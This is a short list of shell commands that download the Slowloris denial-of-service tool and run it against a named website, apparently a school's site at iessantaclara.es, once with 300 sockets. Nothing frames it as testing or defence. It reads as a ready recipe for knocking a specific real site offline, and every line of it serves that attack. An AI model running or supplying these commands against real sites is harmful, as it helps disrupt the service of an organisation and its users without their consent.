git clone https://github.com/gkbrk/slowloris.git
cd slowloris
python3 slowloris.py [website url] -s [number of sockets]
python3 slowloris.py https://iessantaclara.es
python3 slowloris.py https://iessantaclara.es -s 300